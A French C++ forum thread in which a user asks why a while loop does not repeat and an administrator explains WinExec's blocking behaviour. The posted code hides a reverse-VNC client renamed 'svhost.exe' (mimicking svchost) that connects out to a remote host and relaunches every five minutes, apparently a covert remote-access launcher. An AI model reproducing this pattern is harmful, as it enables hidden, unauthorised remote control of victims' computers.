begin process at 2010 03 13 02:07:41
  Trouver un code source :

dans

Accueil > Forum > 

C++ & C++ .NET

> 

Windows

> 

System

> 

Boucle While, qui ne boucle pas ? ^o)

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Boucle While, qui ne boucle pas ? ^o)

dimanche 10 août 2008 à 17:33:58 | Boucle While, qui ne boucle pas ? ^o)

oshin

J'ai un petit soucis et je comprends vraiment pas d'ou ça peut venir.
J'ai un boucle while qui ne boucle pas... et du coup ne recommence pas:

#include <windows.h>

int main()
{

while(1) {

WinExec("VncReverseHide\\svhost.exe -cucumefesse::9250 -run",SW_HIDE);
             Sleep(300000);
             WinExec("tskill svhost",SW_HIDE);
             }
             }

Et donc le probleme :

Lorsque je lance l'application, elle démarre bien svhost avec la ligne de commande, 300 secondes après, elle kill bien svhost... mais ne le relance pas...?

Je pige pas :o

Merci

dimanche 10 août 2008 à 20:20:41 | Re : Boucle While, qui ne boucle pas ? ^o)

racpp

Administrateur CodeS-SourceS
Réponse acceptée !
Salut,
Le problème vient sûrement de tskill qui bloquerait WinExec(). Cette fonction est déconseillée car les applications Win32 devraient utiliser ShellExecute() ou CreateProcess().

dimanche 10 août 2008 à 21:16:20 | Re : Boucle While, qui ne boucle pas ? ^o)

oshin

Je vais essayer avec un shellexecute alorsxD
dimanche 10 août 2008 à 22:02:52 | Re : Boucle While, qui ne boucle pas ? ^o)

oshin

C'était bien ça le problème... merci (même si je comprends pas pourquoi..) XD
dimanche 10 août 2008 à 22:38:46 | Re : Boucle While, qui ne boucle pas ? ^o)

racpp

Administrateur CodeS-SourceS
WinExec() est une vieille fonction héritée du monde 16 bits. Elle n'existe donc que pour compatibilité. Pour qu'elle retourne, le processus lancé doit appeler GetMessage(). Sinon, elle reste bloquée. Pour les applications Win32, ça ne poserait aucun problème car elles ont une boucle de messages utilisant GetMessage(). Les applications console quant à elles,  dépourvues de boucles de messages, bloqueraient la fonction WinExec(). Il semble que tskill() est dans ce cas.

Cette discussion est classée dans : boucle, while, hide, winexec, svhost

Répondre à ce message

Sujets en rapport avec ce message

Probleme pour kbhit [ par ChAnGy59 ] Bonjour a tous,Voila mon petit sousis, j'aimerai pouvoir sortir d'une boucle while en "frappant" la touche Q, a l'aide de kbhit. Je voulais savoir si arret boucle while par clic bouton [ par julienbornet ] Bonjour, je suis entrain de programer une API. Cette api est programmer dans une dialogu box. et je chehce a arreter une boucle while lorsque l'utilis Comparaison et boucle while ; ISO C++ forbids comparison between pointer and integer [ par wizard512 ] Bonjours,Je souhaiterais savoir, svp,qui pourait m'aider pour résoudre un problème,lier a une comparaison et une boucle while,Voici l'erreur obtenue : Problème avec une boucle while [ par arconius ] voilà j'ai fait un prog où l'on tire des dés mais j'ai un problème avec ma boucle while car au lieu de me donner un chiffre aléatoire à chaque fois il boucle de message interrompue [ par juliol ] bonjour, je fais un prog qui utilise un hookpour qu'il tourne en permanence, apres l'avoir cree, je lance une boucle infinie et je met ma boucle de me RAND : éviter de sortir un nombre déjà sorti... prob ! [ par did2604 ] Bonsoir,J'ai un problème assez spécial à vous exposer. Je me casse la tête dessus depuis 2h et pas moyen de trouver le bug. Voilà, j'utilise donc la f sortir d'une boucle while infinie avec un bouton [ par bertrandbasch ] Bonjour,En fait je voudrai pouvoir lancer une boucle while à l'aide d'un bouton 1 qui pourrait être stoppé à l'aide d'un bouton stop.Il me faut cette boucle do while et timer [ par gogeta2003 ] Salut, je doit récupérer une valeur que je lis sur une carte E/S, et j'attend dans une boucle infini pour passer au cycle suivant tant que je n'ai pas pti pb de thread [ par sena ] Bonjour,j'ai un prog dans lequel je créé un thread.Ce thread tourne en boucle. Dedans j'ai une boucle While(true)Je voudrais savoir comment je pourrai

Nos sponsors

Appels d'offres

Sondage...

Comparez les prix

CalendriCode

Mars 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728
293031    

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 3,401 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales